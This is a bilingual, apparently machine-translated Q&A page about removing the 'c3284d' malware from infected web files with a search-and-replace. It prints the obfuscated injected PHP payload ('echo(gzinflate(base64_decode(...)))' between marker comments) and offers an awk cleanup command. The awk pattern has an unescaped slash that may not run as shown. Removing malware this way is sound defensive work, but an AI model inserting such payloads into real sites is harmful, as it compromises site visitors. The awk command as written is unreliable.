清理感染c3284d病毒的服务器，使用搜索替换 [英] Clean server infected with c3284d virus, using search and replace

问题描述

我遇到了 Notorious c3284d 病毒的问题.它几乎修改了它可以找到的所有 html/php/js 文件.

I'm having an issue with the Notorious c3284d virus. It modifies pretty much all the html/php/js files it can find.

我已经更改了服务器上的所有密码和用户，所以如果它是一个被盗用的帐户，它应该可以解决该问题，但我仍在努力将其完全删除.

I've changed all the passwords and users on the server, so if it's a compromised account it should have solved that issue, but I'm still struggling with removing it altogether.

我能够使用简单的 sudo grep -R "#c3284d#"/home 命令找到所有受感染的文件.

I was able to find it all the infected files using a simple sudo grep -R "#c3284d#" /home command.

但我需要一种快速搜索和替换的方法.

But I need a quick way to search and replace it.

病毒签名是这一行:

"#c3284d#"回波(gzinflate(BASE64_DECODE( VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 +/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU + y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + HIeK + Pqabw ==")));#/c3284d#"

"#c3284d#" echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw=="))); "#/c3284d#"

当回声线可以改变和变化时，它总是以 #c32..# 开始并以 #/c3....# 结束.

When the echo line can change and vary, but it will always start with #c32..# and finish with #/c3....#.

我只想什么都不用替换它.

I just want to replace it with nothing.

推荐答案

awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#/c3284d#") == 0) { print $0 } }' dirty-file > clean-file

那是一口，但它确实有效:

That's a mouthful but it does the trick:

$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#/c3284d#") == 0) { print $0 } }'
> foo
> #c3284d#
> bar
> baz
> #/c3284d#
> quux
> EOF
foo
quux

这篇关于清理感染c3284d病毒的服务器，使用搜索替换的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！